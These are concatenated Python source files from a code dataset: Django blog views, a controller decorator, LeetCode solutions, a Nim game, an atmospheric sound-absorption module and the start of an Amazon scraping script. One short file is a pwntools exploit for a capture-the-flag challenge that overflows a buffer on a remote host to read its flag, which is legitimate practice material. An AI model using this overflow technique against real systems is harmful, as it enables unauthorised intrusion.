AVL\"\n print(str(Manager.add_item(num, strcuk_typ)) + \"\\n\")\n else:\n print(\"*** Opcion invalida ***\")\n else:\n print(\"*** Error al mover ***\")\n\n\ndef get_input():\n\n success = True\n\n while success:\n try:\n option = int(input(\"Digite el numero: \"))\n success = False\n\n except ValueError:\n print(\"El numero debe ser entero\")\n\n return option\n\n\nif __name__ == \"__main__\":\n start()\n","sub_path":"repaso.py","file_name":"repaso.py","file_ext":"py","file_size_in_byte":6059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"467481193","text":"import inspect\n\n\ndef viewable(fnc):\n '''\n Decorator, mark a function as viewable and gather some metadata in the process\n\n '''\n def get_method_args(func):\n '''\n Return the method define arguments\n\n :param: func: Function to analyze\n :type: function\n\n :returns: A dictionary with the required and optional arguments\n :rtype: dictionary\n '''\n func_args = inspect.getargspec(func)\n if func_args.defaults is not None:\n\n optional_len = len(func_args.defaults)\n\n func_required = func_args.args[:-optional_len]\n func_optional = dict(\n zip(func_args.args[-optional_len:], func_args.defaults))\n\n else:\n func_required = func_args.args\n func_optional = {}\n\n func_required = [\n args for args in func_required if args not in ('cls', 'self')]\n return func_required, func_optional\n \n def call(*pargs, **kwargs):\n return fnc(*pargs, **kwargs)\n\n # Mark the function as viewable\n call.is_viewable = True\n # Collect metadata about the required and optional arguements\n required, optional = get_method_args(fnc)\n call.required_args = required\n call.optional_args = optional\n # Get the function documentation\n call.doc = inspect.getdoc(fnc) or \"\"\n # Return the wrapper function\n return call\n\n\nclass BaseController(object):\n '''\n Base class controller. Exposes one single default action\n '''\n\n @viewable\n def index(self):\n '''\n Default controller method.\n '''\n return ''\n\n\nclass HelloController(BaseController):\n '''\n Sample Controller Class 1\n '''\n\n def __init__(self):\n self.price_per_unit = 5\n\n @viewable\n def say_hello(self, name, first_time=True):\n '''\n Return a message saying Hello\n\n :param: name: Clients name\n :type: string\n\n :param: first_time: determine if this is the first visit\n :type: string\n\n :returns: A hello message\n :rtype: string\n '''\n if first_time:\n return \"Hello {}.\\nNice to meet you.\".format(name)\n else:\n return \"Hello {}.\\nWelcome back.\".format(name)\n\n @viewable\n def take_order(self, product, quantity):\n '''\n Take an order and return a thank you message\n\n :param: product: Product to purchase\n :type: string\n\n :param: quantity: number of goods to purchase\n :type: int \n\n :returns: A thank you message\n :rtype: string\n\n '''\n response_format = \"Thank you.\\nYou have ordered {} {}.\\nThat would be {}$ please.\"\n response = response_format.format(\n quantity,\n product,\n quantity * self.price_per_unit)\n return response\n\n def _protected_method(self):\n '''\n This method is protected and should not be exposed\n '''\n return \"Please don't!\"\n\n\nclass GoodByeController(BaseController):\n '''\n Sample Controller class 2\n '''\n\n @viewable\n def say_goodbye(self, nice=True):\n '''\n Return a message saying GoodBye\n\n :param: nice: Determine if the answer should be nice\n :type: boolean\n\n :returns: A string message saying goodbye\n :rtype: string\n '''\n if nice:\n return \"Goodbye. It was a pleasure.\"\n else:\n return \"Get the hell out of here.\"\n\n @viewable\n def kick(self):\n '''\n Self explanatory\n\n :returns: A string message saying you should be careful\n :rtype: string\n '''\n return \"Someone's butt is about to get kicked.\"\n\n def public_method(self):\n '''\n This method is public, yet should not be exposed\n '''\n return \"Please don't!\"\n","sub_path":"blog_source_code/exposing_class_as_webservice/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"454520443","text":"from django.shortcuts import render, redirect\nfrom django.views.generic.base import View\n\nfrom util.mixin_utils import LoginRequiredMixin\nfrom .models import Org, CityDict, Author\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\nfrom .form import UserAskForm\nfrom django.http import HttpResponse\nfrom operation.models import UserFavorite\nfrom blogs.models import Blogs\n\n\n# Create your views here.\nclass OrgListView(View):\n def get(self, request):\n # 组织\n all_orgs = Org.objects.all()\n top_orgs = all_orgs.order_by('click_nums')[:3]\n # 作者\n all_author = Author.objects.all()\n authors = all_author.order_by('-click_nums')[:3]\n # 城市\n all_citys = CityDict.objects.all()\n # 城市筛选\n city_id = request.GET.get('city', '')\n if city_id:\n all_orgs = all_orgs.filter(city_id=int(city_id))\n # 类别筛选\n category = request.GET.get('ct', '')\n if category:\n all_orgs = all_orgs.filter(category=category)\n\n sort = request.GET.get('sort', '')\n if sort:\n if sort == 'fav_nums':\n all_orgs = all_orgs.order_by('-fav_nums')\n elif sort == 'click_nums':\n all_orgs = all_orgs.order_by('-click_nums')\n\n org_nums = all_orgs.count()\n # 分页\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n\n p = Paginator(all_orgs, 2, request=request)\n orgs = p.page(page)\n\n return render(request, 'org_list.html', {\n \"all_orgs\": orgs,\n 'all_citys': all_citys,\n 'org_nums': org_nums,\n 'city_id': city_id,\n 'category': category,\n 'top_orgs': top_orgs,\n 'sort': sort,\n 'authors':authors,\n })\n\n\nclass AddUserAskView(View):\n # 用户添加咨询\n def post(self, request):\n userask_form = UserAskForm(request.POST)\n if userask_form.is_valid():\n user_ask = userask_form.save(commit=True)\n return HttpResponse(\"{'status':'success'}\", content_type='application/json')\n else:\n return HttpResponse(\"{'status':'fail','msg':{0}}\".format(userask_form.errors))\n\n\nclass OrgDetailView(View):\n #组织详情\n def get(self, request, org_id):\n all_orgs = Org.objects.all()\n top_orgs = all_orgs.order_by('click_nums')[:3]\n top_blogs=Blogs.objects.all()\n blogs=top_blogs.order_by('click_nums')[:3]\n blog_org = Org.objects.get(id=int(org_id))\n\n blog_org.click_nums+=1\n blog_org.save()\n\n favs=UserFavorite.objects.filter(fav_id=int(org_id),fav_type=2)\n all_blogs = blog_org.blogs_set.all()\n all_authors = blog_org.author_set.all()\n return render(request, 'org_detail.html', {\n 'all_blogs': all_blogs,\n 'all_authors': all_authors,\n 'blog_org': blog_org,\n 'favs':favs,\n 'top_orgs':top_orgs,\n 'blogs':blogs\n })\n\nclass AuthorView(View):\n def get(self, request, author_id):\n #热门博客\n all_blogs = Blogs.objects.all()\n top_blogs = all_blogs.order_by('-click_nums')[:3]\n # 热门组织\n all_orgs = Org.objects.all()\n top_orgs = all_orgs.order_by('click_nums')[:3]\n #收藏状态\n favs = UserFavorite.objects.filter(fav_id=int(author_id), fav_type=3)\n\n if int(author_id)>0:\n author=Author.objects.get(id=int(author_id))\n blogs=Blogs.objects.filter(author=author)\n return render(request, 'author.html', {\n 'author':author,\n 'author_id':int(author_id),\n 'blogs':blogs,\n 'favs': favs,\n 'top_blogs':top_blogs,\n 'top_orgs':top_orgs,\n })\n else:\n authors=Author.objects.all()\n return render(request, 'author.html', {\n 'authors': authors,\n 'author_id': int(author_id),\n 'top_blogs': top_blogs,\n 'top_orgs': top_orgs,\n })\n\nclass AddFavView(LoginRequiredMixin,View):\n def post(self, request):\n org_id = request.POST.get('org_id', '')\n #收藏编号\n fav_id = request.POST.get('fav_id', '')\n #收藏类型\n fav_type = request.POST.get('fav_type', '')\n\n exist_records = UserFavorite.objects.filter(user=request.user, fav_id=int(fav_id), fav_type=int(fav_type))\n if exist_records:\n exist_records.delete()\n if int(fav_type)==3:\n author = Author.objects.get(id=int(fav_id))\n author.fav_nums -= 1\n if author.fav_nums < 0:\n author.fav_nums = 0\n author.save()\n author_id = org_id\n return redirect('org:author', author_id)\n elif int(fav_type)==2:\n org=Org.objects.get(id=int(fav_id))\n org.fav_nums-=1\n if org.fav_nums<0:\n org.fav_nums=0\n org.save()\n return redirect('org:detail', org_id)\n elif int(fav_type)==1:\n blog=Blogs.objects.get(id=int(fav_id))\n blog.fav_nums-=1\n if blog.fav_nums<0:\n blog.fav_nums=0\n blog.save()\n blog_id=org_id\n return redirect('blogs:blog_detail', blog_id)\n else:\n user_fav = UserFavorite()\n if int(fav_id) > 0 and int(fav_type) > 0:\n user_fav.fav_id = int(fav_id)\n user_fav.user_id=request.user.id\n user_fav.fav_type=int(fav_type)\n user_fav.save()\n if int(fav_type) == 3:\n author = Author.objects.get(id=int(fav_id))\n author.fav_nums += 1\n author.save()\n author_id = org_id\n return redirect('org:author', author_id)\n elif int(fav_type) == 2:\n org = Org.objects.get(id=int(fav_id))\n org.fav_nums += 1\n org.save()\n return redirect('org:detail',org_id)\n elif int(fav_type) == 1:\n blog = Blogs.objects.get(id=int(fav_id))\n blog.fav_nums += 1\n blog.save()\n blog_id = org_id\n return redirect('blogs:blog_detail', blog_id)\n else:\n if int(fav_type) == 3:\n return render(request, 'author.html')\n elif int(fav_type) == 2:\n return render(request, 'org_detail.html')\n elif int(fav_type) == 1:\n return render(request, 'blog_detail.html')","sub_path":"apps/organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"649971041","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\n\n\nclass Scatterer(object):\n\n def __init__(self, color, marker, title):\n self.color = color\n self.marker = marker \n \n self.fig = plt.figure(figsize=(8,8))\n self.ax = self.fig.add_subplot(1, 1, 1)\n plt.legend()\n self.ax.hold(True)\n self.ax.set_title(title, fontsize=20, fontname=\"serif\")\n\n plt.ion()\n plt.show(False)\n plt.draw()\n\n def scatter(self, x, y):\n self.ax.scatter([x], [y], color=self.color, marker=self.marker)\n\n plt.pause(0.001)\n\n","sub_path":"Scatterer.py","file_name":"Scatterer.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"417821562","text":"import heapq\n\nclass Solution(object):\n def getSkyline(self, buildings):\n \"\"\"\n :type buildings: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n # 只需比较每栋建筑的左右两边,是否需要记录即可\n path = []\n for l, r, h in buildings:\n path.append((l, - h, r))\n path.append((r, 0, 0))\n \n # 保证从左向右,且相同横坐标最高的先被访问\n path = sorted(path)\n # print path\n \n # 高度与右边界的最小堆,保证实际高度最大的在最前面\n hi_q = [(0, float('inf'))]\n \n # 目标结果集,初始化一个元素为了方便 result[-1] 获取\n result = [[0, 0]]\n for x, neg_h, r in path:\n # 如果最高点已在当前点的左侧,说明需要过期处理\n while hi_q[0][1] <= x:\n heapq.heappop(hi_q)\n \n # 如果是左侧节点(右侧节点 neg_h==0)\n if neg_h:\n heapq.heappush(hi_q, [neg_h, r])\n \n if result[-1][1] + hi_q[0][0]:\n result.append([x, - hi_q[0][0]])\n return result[1:]\n \n","sub_path":"算法面试题汇总/6树/4天际线问题-借鉴别人的.py","file_name":"4天际线问题-借鉴别人的.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"619120739","text":"from pwn import * \nr = remote('node3.buuoj.cn',28998)\nelf = ELF('pwnme2')\ngets_plt = elf.plt['gets']\nstring = 0x804A060\nfuck_func = 0x80485CB\npayload = 'a'*0x70+p32(gets_plt)+p32(fuck_func)+p32(string)\nr.sendline(payload)\nr.sendline('/flag')\nr.interactive()","sub_path":"pwn/cmcc_pwnme2/fuck.py","file_name":"fuck.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"513714329","text":"pontos_computador = 0\npontos_usuario = 0\ndef campeonato():\n \n print(\"##### PARTIDA 01 #####\")\n partida()\n print(\"##### PARTIDA 02 #####\")\n partida()\n print(\"##### PARTIDA 03 #####\")\n partida()\n \n if pontos_usuario > pontos_computador:\n print(\"Você venceu o campeonato por {}x{}\".format(pontos_usuario,pontos_computador))\n else:\n print(\"Você perdeu o campeonato por {}x{}\".format(pontos_computador,pontos_usuario))\n\ndef partida():\n global pontos_computador\n global pontos_usuario\n \n qnt_pecas = set_pecas()\n lmt_pecas_possivel = set_limite_pecas()\n \n if lmt_pecas_possivel > qnt_pecas:\n print(\"Nao ha como tirar mais do que {} pecas\".format(qnt_pecas))\n qnt_pecas = set_pecas()\n lmt_pecas_possivel = set_limite_pecas()\n \n if qnt_pecas % (lmt_pecas_possivel + 1) == 0 :\n print(\"Voce comeca!\")\n auxUsuario = True\n else:\n print(\"Computador comeca!\")\n auxUsuario = False\n \n while qnt_pecas > 0:\n if auxUsuario:\n #usuario joga\n qnt_pecas -= usuario_escolhe_jogada(qnt_pecas, lmt_pecas_possivel)\n if qnt_pecas == 0:\n print(\"Você venceu!\")\n pontos_usuario+=1\n break\n print(\"Sobraram {} peças na mesa.\".format(qnt_pecas))\n auxUsuario = not auxUsuario\n else:\n #computador joga\n print(\"Jogada do computador.\")\n qnt_pecas -= computador_escolhe_jogada(qnt_pecas, lmt_pecas_possivel)\n if qnt_pecas == 0:\n print(\"O computador venceu!\")\n pontos_computador+=1\n break\n print(\"Sobraram {} peças na mesa.\".format(qnt_pecas))\n auxUsuario = not auxUsuario\n\ndef set_pecas():\n return int(input(\"Quantas pecas?\"))\n\ndef set_limite_pecas():\n return int(input(\"Limite de pecas por jogada?\"))\n\ndef usuario_escolhe_jogada(n,m):\n qnt_usuario_remove=int(input(\"Quantas pecas deseja tirar ?\"))\n '''\n if nm:\n print(\"Valor invalido ! Voce pode tirar no maximo {} pecas\".format(m))\n qnt_usuario_remove = usuario_escolhe_jogada(n,m)\n '''\n if qnt_usuario_remove > m or qnt_usuario_remove > n:\n print(\"Valor invalido ! Voce pode tirar no maximo {} pecas\".format(m))\n qnt_usuario_remove = usuario_escolhe_jogada(n,m)\n \n print(\"O usuario removeu {} pedras da mesa\".format(qnt_usuario_remove))\n return qnt_usuario_remove\n\ndef computador_escolhe_jogada(qnt_pecas,limite_pecas_jogada):\n if limite_pecas_jogada == 1:\n return 1\n for i in range(1,limite_pecas_jogada+1,1):\n if (qnt_pecas-i) % (limite_pecas_jogada+1) == 0:\n print(\"O computador removeu {} pecas do tabuleiro\".format(i))\n return i\n\nprint(\"Bem-Vindo ao jogo do Nim\\n\\n\")\nmodo_jogo=int(input(\"1- Para jogar uma partida isolada\\n2- Para jogar um campeonato\\n\"))\nif modo_jogo == 1:\n partida()\nif modo_jogo == 2:\n campeonato()","sub_path":"ExerciciosPython/jogoDoNim.py","file_name":"jogoDoNim.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"178522197","text":"#!/usr/bin/python\nclass Solution(object):\n\tcounter = 0\n\tdef pathSum(self, root, sum):\n\t\tif not root:\n\t\t\treturn self.counter\n\t\tif root:\n\t\t\tself.helper(root, sum)\n\t\treturn self.counter\n\t\t\n\t\n\tdef helper(self, node, target):\n\t\tif not node.left and not node.right:\n\t\t\tif node.val == target:\n\t\t\t\tself.counter += 1\n\t\t\treturn [node.val]\n\t\tleft,right = [], []\n\t\tif node.left:\n\t\t\tleft = self.helper(node.left,target)\n\t\tif node.right:\n\t\t\tright = self.helper(node.right,target)\n\t\tpathSum = []\n\t\tpathSum.append(node.val)\n\t\tif left:\n\t\t\tfor v in left:\n\t\t\t\tpathSum.append(v+node.val)\n\t\tif right:\n\t\t\tfor v in right:\n\t\t\t\tpathSum.append(v+node.val)\n\t\tfor v in pathSum:\n\t\t\tif v == target:\n\t\t\t\tself.counter += 1\n\t\treturn pathSum\n","sub_path":"interview/facebook/easy/LC437. Path Sum III.py","file_name":"LC437. Path Sum III.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"571577300","text":"\"\"\"\nModule containing functions and a classes related to atmospheric acoustics.\n\"\"\"\nfrom __future__ import division, print_function\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntry:\n from pyfftw.interfaces.numpy_fft import ifft # Performs much better than numpy's fftpack\nexcept ImportError: # Use monkey-patching np.fft perhaps instead?\n from numpy.fft import ifft\n\n\ndef soundspeed(ref_temp, temp):\n \"\"\"\n Speed of sound :math:`c`.\n \n :param ref_temp: Reference temperature :math:`T`\n :param temp: Ambient temperature :math:`T_0`\n \n According to ISO9613-1:1993.\n \n .. math:: c = 343.2 \\\\left( \\\\frac{T}{T_0} \\\\right)\n \n \"\"\"\n return 343.2 * np.sqrt(temp / ref_temp)\n \ndef saturation_pressure(ref_pressure, triple_temp, temp):\n \"\"\"\n Saturation vapour pressure :math:`p_{sat}`.\n \n :param ref_pressure: Reference pressure :math:`p_r`\n :param triple_temp: Triple point temperature water :math:`T_{01}`\n :param temp: Ambient temperature :math:`T`\n \n According to ISO9613-1:1993.\n \n .. math:: p_{sat} = 10^C \\cdot p_r\n \n with exponent :math:`C` given by\n \n .. math:: C = -6.8346 \\cdot \\\\left( \\\\frac{T_{01}}{T} \\\\right)^{1.261} + 4.6151\n \n \"\"\"\n return ref_pressure * 10.0** (-6.8346 *(triple_temp/temp)**(1.261) + 4.6151)\n\ndef molar_concentration_water_vapour(relative_humidity, saturation_pressure, pressure):\n \"\"\"\n Molar concentration of water vapour :math:`h`.\n \n :param relative_humidity: Relative humidity :math:`h_r`\n :param saturation_pressure: Saturation pressure :math:`p_{sat}`\n :param pressure: Ambient pressure :math:`p`\n \n According to ISO9613-1:1993.\n \n .. math:: h = h_r \\\\frac{p_{sat}}{p_a}\n \n \"\"\"\n return relative_humidity * saturation_pressure / pressure\n\ndef relaxation_frequency_oxygen(pressure, ref_pressure, h):\n \"\"\"\n Relaxation frequency of oxygen :math:`f_{r,O}`.\n \n :param pressure: Ambient pressure :math:`p_a`\n :param ref_pressure: Reference pressure :math:`p_r`\n :param h: Molar concentration of water vapour :math:`h`\n \n According to ISO9613-1:1993.\n \n .. math:: f_{r,O} = \\\\frac{p_a}{p_r} \\\\left( 24 + 4.04 \\cdot 10^4 h \\\\frac{0.02 + h}{0.391 + h} \\\\right)\n \n \"\"\"\n return pressure / ref_pressure * ( 24.0 + 4.04 * 10.0**4.0 * h * (0.02 + h) / (0.391 + h) )\n\ndef relaxation_frequency_nitrogen(pressure, ref_pressure, temperature, ref_temperature, h): \n \"\"\"\n Relaxation frequency of nitrogen :math:`f_{r,N}`.\n \n :param pressure: Ambient pressure :math:`p_a`\n :param ref_pressure: Reference pressure :math:`p_{ref}`\n :param temperature: Ambient temperature :math:`T`\n :param ref_temperature: Reference temperature :math:`T_{ref}`\n :param h: Molar concentration of water vapour :math:`h`\n \n According to ISO9613-1:1993.\n \n .. math:: f_{r,N} = \\\\frac{p_a}{p_r} \\\\left( \\\\frac{T}{T_0} \\\\right)^{-1/2} \\cdot \\\\left( 9 + 280 h \\exp{\\\\left\\{ -4.170 \\\\left[ \\\\left(\\\\frac{T}{T_0} \\\\right)^{-1/3} -1 \\\\right] \\\\right\\} } \\\\right)\n \n \"\"\"\n return pressure / ref_pressure * (temperature/ref_temperature)**(-0.5) * (9.0 + 280.0 * h * np.exp(-4.170 * ((temperature/ref_temperature)**(-1.0/3.0) - 1.0 ) ) )\n\ndef attenuation_coefficient(pressure, reference_pressure, temperature, reference_temperature, relaxation_frequency_nitrogen, relaxation_frequency_oxygen, frequency):\n \"\"\"\n Attenuation coefficient :math:`\\\\alpha` describing atmospheric absorption in dB/m for the specified ``frequency``.\n \n :param temperature: Ambient temperature :math:`T`\n :param pressure: Ambient pressure :math:`T`\n \n :param frequency: Frequencies to calculate :math:`\\\\alpha` for.\n \n According to ISO9613-1:1993.\n \"\"\"\n return 8.686 * frequency**2.0 * ( ( 1.84 * 10.0**(-11.0) * (reference_pressure/pressure) * (temperature/reference_temperature)**(0.5)) + (temperature/reference_temperature)**(-2.5) * ( 0.01275 * np.exp(-2239.1 / temperature) * (relaxation_frequency_oxygen + (frequency**2.0/relaxation_frequency_oxygen))**(-1.0) + 0.1068 * np.exp(-3352.0/temperature) * (relaxation_frequency_nitrogen + (frequency**2.0/relaxation_frequency_nitrogen))**(-1.0) ) )\n\n\nclass Atmosphere(object):\n \"\"\"\n Class describing atmospheric conditions.\n \"\"\"\n \n REF_TEMP = 293.15\n \"\"\"Reference temperature\"\"\"\n \n REF_PRESSURE = 101.325\n \"\"\"International Standard Atmosphere in kilopascal\"\"\"\n \n TRIPLE_TEMP = 273.16\n \"\"\"Triple point isotherm temperature.\"\"\"\n\n def __init__(self, temperature=293.15, pressure=101.325, relative_humidity=0.0):\n \"\"\"\n Constructor\n \n :param temperature: Temperature\n :param pressure: Pressure\n :param relative_humidity: Relative humidity\n \"\"\"\n \n ###self.__class__.temperature.add_callback(self, self._update)\n ###self.__class__.pressure.add_callback(self, self._update)\n ###self.__class__.relative_humidity.add_callback(self, self._update)\n \n self.temperature = temperature\n \"\"\"Ambient temperature :math:`T`.\"\"\"\n \n self.pressure = pressure\n \"\"\"Ambient pressure :math:`p_a`.\"\"\"\n \n self.relative_humidity = relative_humidity\n \"\"\"Relative humidity\"\"\"\n \n @property\n def soundspeed(self):\n \"\"\"\n Speed of sound :math:`c` calculated using :func:`Auraliser.Atmosphere.soundspeed`.\n \"\"\"\n return soundspeed(self.temperature, self.REF_TEMP)\n \n @property\n def saturation_pressure(self):\n \"\"\"\n Saturation pressure :math:`p_{sat}` calculated using :func:`Auraliser.Atmosphere.saturation_pressure`.\n \"\"\"\n return saturation_pressure(self.REF_PRESSURE, self.TRIPLE_TEMP, self.temperature)\n \n @property\n def molar_concentration_water_vapour(self):\n \"\"\"\n Molar concentration of water vapour :math:`h` calculated using :func:`Auraliser.Atmosphere.molar_concentration_water_vapour`.\n \"\"\"\n return molar_concentration_water_vapour(self.relative_humidity, self.saturation_pressure, self.pressure)\n \n @property\n def relaxation_frequency_nitrogen(self):\n \"\"\"\n Resonance frequency of nitrogen :math:`f_{r,N}` calculated using :func:`Auraliser.Atmosphere.relaxation_frequency_nitrogen`.\n \"\"\"\n return relaxation_frequency_nitrogen(self.pressure, self.REF_PRESSURE, self.temperature, self.REF_TEMP, self.molar_concentration_water_vapour)\n \n @property\n def relaxation_frequency_oxygen(self):\n \"\"\"\n Resonance frequency of oxygen :math:`f_{r,O}` calculated using :func:`Auraliser.Atmosphere.relaxation_frequency_oxygen`.\n \"\"\"\n return relaxation_frequency_oxygen(self.pressure, self.REF_PRESSURE, self.molar_concentration_water_vapour)\n \n \n def attenuation_coefficient(self, frequency):\n \"\"\"\n Attenuation coefficient :math:`\\\\alpha` describing atmospheric absorption in dB/m as function of ``frequency``.\n \n :param frequency: Frequencies to be considered.\n \"\"\"\n return attenuation_coefficient(self.pressure, self.REF_PRESSURE, self.temperature, self.REF_TEMP, self.relaxation_frequency_nitrogen, self.relaxation_frequency_oxygen, frequency)\n \n ###def atmospheric_absorption(self, signal):\n ###\"\"\"\n ###Calculate the signal for the atmospheric absorption.\n \n ###:param signal:\n ###:type signal: `Auraliser.Signal.Signal`\n ###\"\"\"\n \n ###\"\"\"Octaves object\"\"\"\n ###o = Acoustics.Octave.Octave(fmin=1.0, fmax=signal.sample_frequency/2.0, order=24)\n ###frequencies = o.center()\n \n ###t = np.arange(0, len(signal)) # Time signal\n \n ###alpha = self.atmosphere.attenuation_coefficient(frequencies)\n \n ###A = 10.0**(alpha/10.0) # Convert from decibel/m to linear/m\n \n ###A *= o.bandwidth() # Integrate over the frequency band\n \n ###phi = np.random.randn(len(frequencies)) # Random phase\n ####phi = np.zeros(len(frequencies))\n \n ###d = self.geometry.distance # Distance. Final Multiplier for signal strength.\n \n ###print A * np.sin(2.0 * np.pi * np.outer(t, frequencies)+ phi)\n \n ###\"\"\"Absorption time signal.\"\"\"\n ###s = d * np.sum( A * np.sin(2.0 * np.pi * np.outer(t, frequencies)+ phi))\n \n ####s /= np.sum(o.bandwidth())\n\n ###return s\n \n ##def absorption_coefficient(self, frequencies):\n ##\"\"\"\n ##Calculate the absorption coefficient in dB/m for the given frequencies.\n \n ##According to ISO9613-1:1993.\n \n ##:param frequencies: Frequencies to calculate alpha for.\n ##:type frequencies: :class:`np.ndarray`\n ##\"\"\"\n \n ###T = np.array(self.temperature, dtype='float128') # Ambient temperature\n ###p_a = np.array(self.pressure, dtype='float128') # Ambient pressure\n ###h = np.array(self.molar_concentration_water_vapour, dtype='float128') # Ambient molar...\n \n ###p_r = np.array(self.REF_PRESSURE, dtype='float128') # Reference pressure\n ###T0 = np.array(self.REF_TEMP, dtype='float128') # Reference temperature\n \n ###f = np.array(frequencies, dtype='float128')\n \n \n ##T = self.temperature # Ambient temperature\n ##p_a = self.pressure # Ambient pressure\n ##h = self.molar_concentration_water_vapour # Ambient molar...\n \n ##p_r = self.REF_PRESSURE # Reference pressure\n ##T0 = self.REF_TEMP # Reference temperature\n \n ##f = frequencies\n \n \n ##\"\"\"Relaxation frequency of oxygen.\"\"\"\n ##f_rO = p_a / p_r * ( 24.0 + 4.04 * 10.0**4.0 * h * (0.02 + h) / (0.391 + h) )\n \n ##\"\"\"Relaxation frequency of nitrogen.\"\"\"\n ##f_rN = p_a / p_r * (T/T0)**(-0.5) * (9.0 + 280.0 * h * np.exp(-4.170 * ((T/T0)**(-1.0/3.0) - 1.0 ) ) )\n \n ##alpha = 8.686 * f**2.0 * ( ( 1.84 * 10.0**(-11.0) * (p_r/p_a) * (T/T0)**(0.5)) + (T/T0)**(-2.5) * ( 0.01275 * np.exp(-2239.1 / T) * (f_rO + (f**2.0/f_rO))**(-1.0) + 0.1068 * np.exp(-3352.0/T) * (f_rN + (f**2.0/f_rN))**(-1.0) ) )\n \n ##return alpha\n \n def ir_attenuation_coefficient(self, d, fs=44100, N=2048, sign=+1):\n \"\"\"\n Calculate the impulse response due to air absorption.\n \n :param fs: Sample frequency\n :param d: Distance\n :param N: Blocks\n :param sign: Multiply (+1) or divide (-1) by transfer function. Multiplication is used for applying the absorption while -1 is used for undoing the absorption.\n \"\"\" \n \n d = d if isinstance(d, np.ndarray) else np.array([d])\n \n f = np.linspace(0.0, fs/2.0, N/2.0) # Frequency vector. A bin for every signal sample.\n \n tf = np.zeros((len(d), len(f)), dtype='complex') # Transfer function needs to be complex, and same size.\n tf += 10.0**( float(sign) * d.reshape((-1,1)) * self.attenuation_coefficient(f) / 20.0 ) # Calculate the actual transfer function.\n \n #print('TF: ' + str(tf.shape))\n \n #tf = np.concatenate( ( tf, np.conj(tf[::-1]) )) \n tf = np.hstack( (tf, np.conj(tf[::-1, :]))) # Positive frequencies first, and then mirrored the conjugate negative frequencies.\n \n #print('TF reshaped: ' + str(tf.shape))\n \n #n = 2**int(np.ceil(np.log2(len(tf)))) # Blocksize for the IFFT. Zeros are padded.\n\n ir = ifft( tf , n=N) # Obtain the impulse response through the IFFT.\n \n ir = np.hstack((ir[:, N/2:N], ir[:, 0:N/2]))\n \n #ir = np.real(ir[0:N/2])\n \n ir = np.real(ir).T\n \n return ir # Note that the reduction is a factor two too much! Too much energy loss now that we use a double-sided spectrum.\n \n def plot_ir_attenuation_coefficient(self, fs, N, d, filename=None):\n \"\"\"\n Plot the impulse response of the attenuation due to atmospheric absorption.\n The impulse response is calculated using :meth:`ir_attenuation_coefficient`.\n \n :param filename: Filename\n :param fs: Sample frequency\n :param N: Blocks\n :param d: Distance\n \n \"\"\"\n fig = plt.figure()\n \n ax0 = fig.add_subplot(111)\n ax0.set_title('Impulse response atmospheric attenuation')\n \n ir = self.ir_attenuation_coefficient(fs, N, d)\n \n xsignal = np.arange(0.0, len(ir)) / fs\n ax0.plot(xsignal, ir)\n ax0.set_xlabel(r'$t$ in s')\n ax0.set_ylabel(r'Some')\n ax0.set_yscale('log')\n ax0.grid()\n \n if filename:\n fig.savefig(filename)\n else:\n fig.show()\n \n \n \n def plot_attenuation_coefficient(self, frequency, filename=None):\n \"\"\"\n Plot the attenuation coefficient :math:`\\\\alpha` as function of frequency and write the figure to ``filename``.\n \n :param filename: Filename\n :param frequency: Frequencies\n \n .. note:: The attenuation coefficient is plotted in dB/km!\n \n \"\"\"\n fig = plt.figure()\n ax0 = fig.add_subplot(111)\n \n ax0.plot(frequency, self.attenuation_coefficient(frequency)*1000.0)\n ax0.set_xscale('log')\n ax0.set_yscale('log')\n ax0.set_xlabel(r'$f$ in Hz')\n ax0.set_ylabel(r'$\\alpha$ in dB/km')\n \n ax0.legend()\n ax0.grid()\n \n if filename:\n fig.savefig(filename)\n else:\n fig.show()\n \n","sub_path":"acoustics/atmosphere.py","file_name":"atmosphere.py","file_ext":"py","file_size_in_byte":14017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"292277070","text":"\"\"\"\n@ Author - Krishnabhashkar jha\n@ Creation date - 17/01/2020\n@ Description - Declares all the Methods to be used at the Process Level.\n\"\"\"\n\nimport time\nimport shutil\nimport os\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom Applications.Workflows.Analytics.RetailerPortalScraping.AmazonPortal.AmazonSuppliers import AmazonSuppliers\nfrom Applications.Workflows.Analytics.RetailerPortalScraping.Utilites.LogFileUtility import LogFileUtility as lo\n\nclass AmazonPortalMain():\n\n def __init__(self):\n chrome_option = Options()\n chrome_option.add_argument(\"--user-data-dir=C:/Users/Krishnabhashkar.Jha/AppData/Local/Google/Chrome/User Data\")\n self.v_Browser = webdriver.Chrome(executable_path='C:/driver/chromedriver', chrome_options=chrome_option)\n self.v_Browser.maximize_window()\n self.lo = lo\n\n def Execute_Main(self):\n try:\n var_pathName = \"C:\\Automation\\Amazon\"\n shutil.rmtree(var_pathName)\n os.makedirs(\"C:\\Automation\" + \"\\\\\" + 'Amazon')\n Days = datetime.datetime.now()\n var_foldername = Days.strftime(\"%d-%b-%Y\")\n var_pathName = \"C:\\Automation\\Amazon\" + \"\\\\\" + var_foldername\n if os.path.exists(var_pathName):\n 